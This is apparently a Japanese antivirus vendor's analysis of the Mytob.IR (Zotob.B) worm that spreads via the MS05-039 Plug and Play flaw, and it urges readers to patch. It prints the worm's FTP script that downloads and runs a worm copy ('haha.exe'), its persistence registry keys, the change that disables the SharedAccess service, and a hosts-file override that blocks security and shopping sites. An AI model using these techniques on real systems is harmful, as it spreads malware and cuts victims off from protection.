Win32/Mytob.IR(別名:Zotob.B) は、MS05-039(プラグアンドプレイサービスの脆弱性)を利用して拡散するワームです。MS05-039に関する詳細は、マイクロソフト社の情報をご参照ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms05-039.mspx
アンチウイルスソフトの有無に関わらず、マイクロソフト社の情報をご参照いただき、この脆弱性を修正するプログラムを適用してください。
[内容]
参考:
以下の説明文では、Windowsオペレーティングシステムがインストールされたディレクトリを%windir%
と表記しており、インストール時の設定により異なる場合があります。%windir% のサブディレクトリである"System"や"System32"は
%system% と表記しています。
Win32/Mytob.IR はUpackで圧縮されており、そのサイズは約15,386バイトです。このワームが実行されると、自分自身のコピーを%system%フォルダに" csm.exe"というファイル名で作成します。
このワームは、自分自身の唯一のコピーだけが感染したコンピュータ上で実行されるようにします。(Mutexという仕組みで、自分自身が二重起動されないようにします。)
このワームは、作成したファイルがWindowsの再起動時に実行されるように、次のレジストリキーを追加します。
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
“csm Win Updates” = “csm.exe”
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
“csm Win Updates” = “csm.exe”
このワームは、これらのレジストリキーを監視して、存在しない場合は再作成します。
また、次のレジストリーキーを変更し、WindowsNT系のOS上で、Shared Accessを無効にします。
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess
“Start” = “4”
このワームは、MS05-039(プラグアンドプレイサービスの脆弱性)利用し、ランダムに生成されたIPアドレスの445番ポートへ接続を試みます。
この脆弱性を利用して、進入に成功した場合、"2pac.txt"という次のFTPコマンドが書かれたファイルをダウンロードします。
open %IP% %TCP port%
user hell rulez
binary
get haha.exe
quit
感染したコンピュータ内で、"2pack.txt"に含まれるFTPコマンドが実行されると、このワームのコピーである"haha.exe"がダウンロードされ、実行されます。このFTPサーバは、33333番ポートを使用します。
このワームは、次のサイトにアクセスするのを避ける為、次のデータで現在のhostsファイルを上書きします。
127.0.0.1 www.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 www.f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 www.avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 avp.com
127.0.0.1 www.networkassociates.com
127.0.0.1 networkassociates.com
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 www.my-etrust.com
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 www.nai.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 pandasoftware.com
127.0.0.1 www.pandasoftware.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.grisoft.com
127.0.0.1 www.microsoft.com
127.0.0.1 microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 www.amazon.com
127.0.0.1 www.amazon.co.uk
127.0.0.1 www.amazon.ca
127.0.0.1 www.amazon.fr
127.0.0.1 www.paypal.com
127.0.0.1 paypal.com
127.0.0.1 moneybookers.com
127.0.0.1 www.moneybookers.com
127.0.0.1 www.ebay.com
127.0.0.1 ebay.com
NOD32アンチウイルスは、アドバンスドヒューリスティック機能によって、ウイルス定義ファイルの更新を行なうことなくWin32/Mytob.IR
を検出することができます。
NOD32アンチウイルスは、ウイルス定義ファイルのバージョン 1.1194 にて対応しています。
|
